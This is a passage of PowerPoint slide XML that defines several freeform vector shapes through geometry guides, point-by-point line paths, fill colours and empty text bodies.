                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36173" name="Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1376" y="2765"/>
                <a:ext cx="53" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 53"/>
                  <a:gd name="T1" fmla="*/ 12 h 51"/>
                  <a:gd name="T2" fmla="*/ 45 w 53"/>
                  <a:gd name="T3" fmla="*/ 19 h 51"/>
                  <a:gd name="T4" fmla="*/ 50 w 53"/>
                  <a:gd name="T5" fmla="*/ 24 h 51"/>
                  <a:gd name="T6" fmla="*/ 53 w 53"/>
                  <a:gd name="T7" fmla="*/ 26 h 51"/>
                  <a:gd name="T8" fmla="*/ 49 w 53"/>
                  <a:gd name="T9" fmla="*/ 26 h 51"/>
                  <a:gd name="T10" fmla="*/ 48 w 53"/>
                  <a:gd name="T11" fmla="*/ 29 h 51"/>
                  <a:gd name="T12" fmla="*/ 51 w 53"/>
                  <a:gd name="T13" fmla="*/ 36 h 51"/>
                  <a:gd name="T14" fmla="*/ 49 w 53"/>
                  <a:gd name="T15" fmla="*/ 42 h 51"/>
                  <a:gd name="T16" fmla="*/ 48 w 53"/>
                  <a:gd name="T17" fmla="*/ 46 h 51"/>
                  <a:gd name="T18" fmla="*/ 47 w 53"/>
                  <a:gd name="T19" fmla="*/ 47 h 51"/>
                  <a:gd name="T20" fmla="*/ 45 w 53"/>
                  <a:gd name="T21" fmla="*/ 41 h 51"/>
                  <a:gd name="T22" fmla="*/ 40 w 53"/>
                  <a:gd name="T23" fmla="*/ 39 h 51"/>
                  <a:gd name="T24" fmla="*/ 42 w 53"/>
                  <a:gd name="T25" fmla="*/ 43 h 51"/>
                  <a:gd name="T26" fmla="*/ 42 w 53"/>
                  <a:gd name="T27" fmla="*/ 45 h 51"/>
                  <a:gd name="T28" fmla="*/ 35 w 53"/>
                  <a:gd name="T29" fmla="*/ 41 h 51"/>
                  <a:gd name="T30" fmla="*/ 38 w 53"/>
                  <a:gd name="T31" fmla="*/ 35 h 51"/>
                  <a:gd name="T32" fmla="*/ 33 w 53"/>
                  <a:gd name="T33" fmla="*/ 31 h 51"/>
                  <a:gd name="T34" fmla="*/ 27 w 53"/>
                  <a:gd name="T35" fmla="*/ 28 h 51"/>
                  <a:gd name="T36" fmla="*/ 20 w 53"/>
                  <a:gd name="T37" fmla="*/ 24 h 51"/>
                  <a:gd name="T38" fmla="*/ 19 w 53"/>
                  <a:gd name="T39" fmla="*/ 20 h 51"/>
                  <a:gd name="T40" fmla="*/ 13 w 53"/>
                  <a:gd name="T41" fmla="*/ 16 h 51"/>
                  <a:gd name="T42" fmla="*/ 12 w 53"/>
                  <a:gd name="T43" fmla="*/ 18 h 51"/>
                  <a:gd name="T44" fmla="*/ 15 w 53"/>
                  <a:gd name="T45" fmla="*/ 20 h 51"/>
                  <a:gd name="T46" fmla="*/ 13 w 53"/>
                  <a:gd name="T47" fmla="*/ 26 h 51"/>
                  <a:gd name="T48" fmla="*/ 9 w 53"/>
                  <a:gd name="T49" fmla="*/ 22 h 51"/>
                  <a:gd name="T50" fmla="*/ 3 w 53"/>
                  <a:gd name="T51" fmla="*/ 19 h 51"/>
                  <a:gd name="T52" fmla="*/ 1 w 53"/>
                  <a:gd name="T53" fmla="*/ 14 h 51"/>
                  <a:gd name="T54" fmla="*/ 4 w 53"/>
                  <a:gd name="T55" fmla="*/ 9 h 51"/>
                  <a:gd name="T56" fmla="*/ 0 w 53"/>
                  <a:gd name="T57" fmla="*/ 4 h 51"/>
                  <a:gd name="T58" fmla="*/ 3 w 53"/>
                  <a:gd name="T59" fmla="*/ 2 h 51"/>
                  <a:gd name="T60" fmla="*/ 4 w 53"/>
                  <a:gd name="T61" fmla="*/ 0 h 51"/>
                  <a:gd name="T62" fmla="*/ 20 w 53"/>
                  <a:gd name="T63" fmla="*/ 3 h 51"/>
                  <a:gd name="T64" fmla="*/ 25 w 53"/>
                  <a:gd name="T65" fmla="*/ 3 h 51"/>
                  <a:gd name="T66" fmla="*/ 32 w 53"/>
                  <a:gd name="T67" fmla="*/ 7 h 51"/>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53"/>
                  <a:gd name="T103" fmla="*/ 0 h 51"/>
                  <a:gd name="T104" fmla="*/ 53 w 53"/>
                  <a:gd name="T105" fmla="*/ 51 h 51"/>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53" h="51">
                    <a:moveTo>
                      <a:pt x="34" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36174" name="Freeform 307"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1598" y="2621"/>
                <a:ext cx="56" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 56"/>
                  <a:gd name="T1" fmla="*/ 33 h 38"/>
                  <a:gd name="T2" fmla="*/ 0 w 56"/>
                  <a:gd name="T3" fmla="*/ 22 h 38"/>
                  <a:gd name="T4" fmla="*/ 0 w 56"/>
                  <a:gd name="T5" fmla="*/ 21 h 38"/>
                  <a:gd name="T6" fmla="*/ 3 w 56"/>
                  <a:gd name="T7" fmla="*/ 18 h 38"/>
                  <a:gd name="T8" fmla="*/ 3 w 56"/>
                  <a:gd name="T9" fmla="*/ 16 h 38"/>
                  <a:gd name="T10" fmla="*/ 2 w 56"/>
                  <a:gd name="T11" fmla="*/ 7 h 38"/>
                  <a:gd name="T12" fmla="*/ 2 w 56"/>
                  <a:gd name="T13" fmla="*/ 3 h 38"/>
                  <a:gd name="T14" fmla="*/ 6 w 56"/>
                  <a:gd name="T15" fmla="*/ 1 h 38"/>
                  <a:gd name="T16" fmla="*/ 9 w 56"/>
                  <a:gd name="T17" fmla="*/ 2 h 38"/>
                  <a:gd name="T18" fmla="*/ 11 w 56"/>
                  <a:gd name="T19" fmla="*/ 2 h 38"/>
                  <a:gd name="T20" fmla="*/ 14 w 56"/>
                  <a:gd name="T21" fmla="*/ 1 h 38"/>
                  <a:gd name="T22" fmla="*/ 16 w 56"/>
                  <a:gd name="T23" fmla="*/ 0 h 38"/>
                  <a:gd name="T24" fmla="*/ 17 w 56"/>
                  <a:gd name="T25" fmla="*/ 2 h 38"/>
                  <a:gd name="T26" fmla="*/ 19 w 56"/>
                  <a:gd name="T27" fmla="*/ 3 h 38"/>
                  <a:gd name="T28" fmla="*/ 26 w 56"/>
                  <a:gd name="T29" fmla="*/ 5 h 38"/>
                  <a:gd name="T30" fmla="*/ 31 w 56"/>
                  <a:gd name="T31" fmla="*/ 5 h 38"/>
                  <a:gd name="T32" fmla="*/ 32 w 56"/>
                  <a:gd name="T33" fmla="*/ 8 h 38"/>
                  <a:gd name="T34" fmla="*/ 34 w 56"/>
                  <a:gd name="T35" fmla="*/ 10 h 38"/>
                  <a:gd name="T36" fmla="*/ 38 w 56"/>
                  <a:gd name="T37" fmla="*/ 13 h 38"/>
                  <a:gd name="T38" fmla="*/ 41 w 56"/>
                  <a:gd name="T39" fmla="*/ 13 h 38"/>
                  <a:gd name="T40" fmla="*/ 45 w 56"/>
                  <a:gd name="T41" fmla="*/ 15 h 38"/>
                  <a:gd name="T42" fmla="*/ 52 w 56"/>
                  <a:gd name="T43" fmla="*/ 18 h 38"/>
                  <a:gd name="T44" fmla="*/ 55 w 56"/>
                  <a:gd name="T45" fmla="*/ 21 h 38"/>
                  <a:gd name="T46" fmla="*/ 56 w 56"/>
                  <a:gd name="T47" fmla="*/ 23 h 38"/>
                  <a:gd name="T48" fmla="*/ 55 w 56"/>
                  <a:gd name="T49" fmla="*/ 24 h 38"/>
                  <a:gd name="T50" fmla="*/ 54 w 56"/>
                  <a:gd name="T51" fmla="*/ 27 h 38"/>
                  <a:gd name="T52" fmla="*/ 52 w 56"/>
                  <a:gd name="T53" fmla="*/ 29 h 38"/>
                  <a:gd name="T54" fmla="*/ 50 w 56"/>
                  <a:gd name="T55" fmla="*/ 29 h 38"/>
                  <a:gd name="T56" fmla="*/ 46 w 56"/>
                  <a:gd name="T57" fmla="*/ 24 h 38"/>
                  <a:gd name="T58" fmla="*/ 44 w 56"/>
                  <a:gd name="T59" fmla="*/ 24 h 38"/>
                  <a:gd name="T60" fmla="*/ 38 w 56"/>
                  <a:gd name="T61" fmla="*/ 24 h 38"/>
                  <a:gd name="T62" fmla="*/ 36 w 56"/>
                  <a:gd name="T63" fmla="*/ 24 h 38"/>
                  <a:gd name="T64" fmla="*/ 33 w 56"/>
                  <a:gd name="T65" fmla="*/ 24 h 38"/>
                  <a:gd name="T66" fmla="*/ 31 w 56"/>
                  <a:gd name="T67" fmla="*/ 24 h 38"/>
                  <a:gd name="T68" fmla="*/ 26 w 56"/>
                  <a:gd name="T69" fmla="*/ 28 h 38"/>
                  <a:gd name="T70" fmla="*/ 23 w 56"/>
                  <a:gd name="T71" fmla="*/ 28 h 38"/>
                  <a:gd name="T72" fmla="*/ 21 w 56"/>
                  <a:gd name="T73" fmla="*/ 24 h 38"/>
                  <a:gd name="T74" fmla="*/ 19 w 56"/>
                  <a:gd name="T75" fmla="*/ 24 h 38"/>
                  <a:gd name="T76" fmla="*/ 18 w 56"/>
                  <a:gd name="T77" fmla="*/ 24 h 38"/>
                  <a:gd name="T78" fmla="*/ 14 w 56"/>
                  <a:gd name="T79" fmla="*/ 27 h 38"/>
                  <a:gd name="T80" fmla="*/ 11 w 56"/>
                  <a:gd name="T81" fmla="*/ 33 h 38"/>
                  <a:gd name="T82" fmla="*/ 8 w 56"/>
                  <a:gd name="T83" fmla="*/ 38 h 38"/>
                  <a:gd name="T84" fmla="*/ 6 w 56"/>
                  <a:gd name="T85" fmla="*/ 37 h 38"/>
                  <a:gd name="T86" fmla="*/ 4 w 56"/>
                  <a:gd name="T87" fmla="*/ 33 h 3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56"/>
                  <a:gd name="T133" fmla="*/ 0 h 38"/>
                  <a:gd name="T134" fmla="*/ 56 w 56"/>
                  <a:gd name="T135" fmla="*/ 38 h 38"/>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56" h="38">
                    <a:moveTo>
                      <a:pt x="4" y="33"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36175" name="Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1598" y="2621"/>
                <a:ext cx="56" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 56"/>
                  <a:gd name="T1" fmla="*/ 33 h 38"/>
                  <a:gd name="T2" fmla="*/ 0 w 56"/>
                  <a:gd name="T3" fmla="*/ 22 h 38"/>
                  <a:gd name="T4" fmla="*/ 0 w 56"/>
                  <a:gd name="T5" fmla="*/ 21 h 38"/>
                  <a:gd name="T6" fmla="*/ 3 w 56"/>
                  <a:gd name="T7" fmla="*/ 18 h 38"/>
                  <a:gd name="T8" fmla="*/ 3 w 56"/>
                  <a:gd name="T9" fmla="*/ 16 h 38"/>
                  <a:gd name="T10" fmla="*/ 2 w 56"/>
                  <a:gd name="T11" fmla="*/ 7 h 38"/>
                  <a:gd name="T12" fmla="*/ 2 w 56"/>
                  <a:gd name="T13" fmla="*/ 3 h 38"/>
                  <a:gd name="T14" fmla="*/ 6 w 56"/>
                  <a:gd name="T15" fmla="*/ 1 h 38"/>
                  <a:gd name="T16" fmla="*/ 9 w 56"/>
                  <a:gd name="T17" fmla="*/ 2 h 38"/>
                  <a:gd name="T18" fmla="*/ 11 w 56"/>
                  <a:gd name="T19" fmla="*/ 2 h 38"/>
                  <a:gd name="T20" fmla="*/ 14 w 56"/>
                  <a:gd name="T21" fmla="*/ 1 h 38"/>
                  <a:gd name="T22" fmla="*/ 16 w 56"/>
                  <a:gd name="T23" fmla="*/ 0 h 38"/>
                  <a:gd name="T24" fmla="*/ 17 w 56"/>
                  <a:gd name="T25" fmla="*/ 2 h 38"/>
                  <a:gd name="T26" fmla="*/ 19 w 56"/>
                  <a:gd name="T27" fmla="*/ 3 h 38"/>
                  <a:gd name="T28" fmla="*/ 26 w 56"/>
                  <a:gd name="T29" fmla="*/ 5 h 38"/>
                  <a:gd name="T30" fmla="*/ 31 w 56"/>
                  <a:gd name="T31" fmla="*/ 5 h 38"/>
                  <a:gd name="T32" fmla="*/ 32 w 56"/>
                  <a:gd name="T33" fmla="*/ 8 h 38"/>
                  <a:gd name="T34" fmla="*/ 34 w 56"/>
                  <a:gd name="T35" fmla="*/ 10 h 38"/>
                  <a:gd name="T36" fmla="*/ 38 w 56"/>
                  <a:gd name="T37" fmla="*/ 13 h 38"/>
                  <a:gd name="T38" fmla="*/ 41 w 56"/>
                  <a:gd name="T39" fmla="*/ 13 h 38"/>
                  <a:gd name="T40" fmla="*/ 45 w 56"/>
                  <a:gd name="T41" fmla="*/ 15 h 38"/>
                  <a:gd name="T42" fmla="*/ 52 w 56"/>
                  <a:gd name="T43" fmla="*/ 18 h 38"/>
                  <a:gd name="T44" fmla="*/ 55 w 56"/>
                  <a:gd name="T45" fmla="*/ 21 h 38"/>
                  <a:gd name="T46" fmla="*/ 56 w 56"/>
                  <a:gd name="T47" fmla="*/ 23 h 38"/>
                  <a:gd name="T48" fmla="*/ 55 w 56"/>
                  <a:gd name="T49" fmla="*/ 24 h 38"/>
                  <a:gd name="T50" fmla="*/ 54 w 56"/>
                  <a:gd name="T51" fmla="*/ 27 h 38"/>
                  <a:gd name="T52" fmla="*/ 52 w 56"/>
                  <a:gd name="T53" fmla="*/ 29 h 38"/>
                  <a:gd name="T54" fmla="*/ 50 w 56"/>
                  <a:gd name="T55" fmla="*/ 29 h 38"/>
                  <a:gd name="T56" fmla="*/ 46 w 56"/>
                  <a:gd name="T57" fmla="*/ 24 h 38"/>
                  <a:gd name="T58" fmla="*/ 44 w 56"/>
                  <a:gd name="T59" fmla="*/ 24 h 38"/>
                  <a:gd name="T60" fmla="*/ 38 w 56"/>
                  <a:gd name="T61" fmla="*/ 24 h 38"/>
                  <a:gd name="T62" fmla="*/ 36 w 56"/>
                  <a:gd name="T63" fmla="*/ 24 h 38"/>
                  <a:gd name="T64" fmla="*/ 33 w 56"/>
                  <a:gd name="T65" fmla="*/ 24 h 38"/>
                  <a:gd name="T66" fmla="*/ 31 w 56"/>
                  <a:gd name="T67" fmla="*/ 24 h 38"/>
                  <a:gd name="T68" fmla="*/ 26 w 56"/>
                  <a:gd name="T69" fmla="*/ 28 h 38"/>
                  <a:gd name="T70" fmla="*/ 23 w 56"/>
                  <a:gd name="T71" fmla="*/ 28 h 38"/>
                  <a:gd name="T72" fmla="*/ 21 w 56"/>
                  <a:gd name="T73" fmla="*/ 24 h 38"/>
                  <a:gd name="T74" fmla="*/ 19 w 56"/>
                  <a:gd name="T75" fmla="*/ 24 h 38"/>
                  <a:gd name="T76" fmla="*/ 18 w 56"/>
                  <a:gd name="T77" fmla="*/ 24 h 38"/>
                  <a:gd name="T78" fmla="*/ 14 w 56"/>
                  <a:gd name="T79" fmla="*/ 27 h 38"/>
                  <a:gd name="T80" fmla="*/ 11 w 56"/>
                  <a:gd name="T81" fmla="*/ 33 h 38"/>
                  <a:gd name="T82" fmla="*/ 8 w 56"/>
                  <a:gd name="T83" fmla="*/ 38 h 38"/>
                  <a:gd name="T84" fmla="*/ 6 w 56"/>
                  <a:gd name="T85" fmla="*/ 37 h 38"/>
                  <a:gd name="T86" fmla="*/ 4 w 56"/>
                  <a:gd name="T87" fmla="*/ 33 h 3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56"/>
                  <a:gd name="T133" fmla="*/ 0 h 38"/>
                  <a:gd name="T134" fmla="*/ 56 w 56"/>
                  <a:gd name="T135" fmla="*/ 38 h 38"/>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56" h="38">
                    <a:moveTo>
                      <a:pt x="4" y="33"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="38"/>
